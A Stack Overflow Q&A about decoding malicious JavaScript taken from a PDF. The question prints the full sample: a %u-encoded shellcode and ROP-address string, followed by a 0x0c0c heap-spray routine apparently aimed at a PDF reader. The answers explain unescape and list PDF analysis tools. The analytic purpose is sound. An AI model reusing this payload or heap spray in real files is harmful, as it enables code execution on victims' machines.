I have a PDF file that I know for a fact contains a JavaScript script file that does something malicious, not really sure what at this point.
I have successfully uncompressed the PDF file and gotten the plaintext JavaScript source code, but it the code itself if kind of hidden in this syntax I haven't seen before.
Code example: This is what the majority of the code looks like
var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')
I imagine that this notation with long variable/function names and hidden text characters is to confuse scanners that look for these type of things.
Two questions:
Question 1
Can someone tell me what this is called with the %u4141
?
Question 2
Is there some tool that will translate that notation into plaintext so I can see what it is doing?
Full JS code:
var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');
var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");
while (C.length + 20 + 8 < 65536) C+=C;
D = C.substring(0, (0x0c0c-0x24)/2);
D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";
Those could be memory addresses, OS calls, heap spraying, anything.
The clue is that the function that is called is unescape
. To get the actual values you want to unescape
that text. There are online tools for unescaping text, such as http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html.
The result will likely be garbage in ASCII, but you can try plugging it into a hex editor to see if you can make any more sense out of it. if a virus scanner can identify the infection source of that file, maybe you can do more research on that particular malware and figure out what that code is doing.
In the interest of science, fire up a Windows VM, run it, and see what it does :)
It looks like you have already extracted the JavaScript from the PDF. Your problem seems to be with analyzing of this JavaScript.
Since this topic (obfuscating and hiding malicious JavaScript code in harmlessly looking PDF files) seems to becoming more and more popular with malware authors, let me list some tools and websites which proofed to be helpful to anyone who's a beginner in dissecting this type of threats:
- Didier Stevens' PDF-Tools
- Part 1 (of many) of Didier Stevens' PDF Malware Screencasts (on YouTube)
- Jay Berkenbilt's QPDF: utility for content-preserving PDF transformations (useful command to unpack all/most compressed objects inside a PDF:
qpdf --qdf original.pdf unpacked.pdf
then open unpacked.pdf in text editor) - Julia Wolf's presentation about PDF malware obfuscation
- peepdf: A Python tool to explore PDFs (find out if they are malicious)
- PDFTricks: a (non-exhaustive) list of PDF source code obfuscation methods
- Wepawet: online resource to analayse PDF/Javascript/Flash files (generates a report)
- Origami-PDF: Ruby tool to analyze and generate malicious PDFs
- (... many more resources not listed here...)
I don't know how exactly you extracted the Javascript snippet you provided in your question. But, by all means, don't rely on having found all of the JS code inside the PDF -- unless you are a PDF expert who knows where to look and how to uncover all possible obfuscations. (I recommend you apply tool No. 3 to your source PDF and look at the resulting PDF in the light of the tipps in No. 6... The other tools may need some more studying of PDF syntax before you can really make them useful to you.)
Update
Here is an update to my (almost 3 years) old answer. It's worth while to add:
pdfinfo -js
: the most recent (Poppler-based!, not XPDF-based) versions ofpdfinfo
(starting with v0.25.0, released Dec 11, 2013) now know the-js
command line parameter which prints out the JavaScript code embedded in a PDF file.This works even for many cases were the
/JavaScript
name within the PDF source code is obfuscated by using (formally legal) PDF name constructs such as/4Aavascript
or/J#61v#61script
or similar.Unfortunately, this marvelous feature addition to
pdfinfo
is still known much too little. Please share!
Update 2
Another update, because the above mentioned peepdf
tool recently got the extract
sub-command added:
peepdf.js
: This is a Python-based command line tool which can analyse PDF files. It was developed by Jose Miguel Esparza mainly in order to "find out if the file can be harmful or not", but is also very good for general exploration of PDF file structures.Installation and usage:
- Clone the GitHub repository:
git clone https://github.com/jesparza/peepdf git.peepdf
. - Create a symlink to the
peepdf.py
script and put it somewhere into your$PATH
:cd git.clone ;
ln -s $(pwd)/peepdf.py ${HOME}/bin/peepdf.py
- Run it in interactive mode, opening a PDF file:
peepdf.py -fil my.pdf
Use the
extract js > all-js-in-my.pdf
command to extract and redirect all JavaScript contained inmy.pdf
into a file. This is depicted by the screenshots below:
- Clone the GitHub repository:
来源:https://stackoverflow.com/questions/10220497/extract-javascript-from-malicious-pdf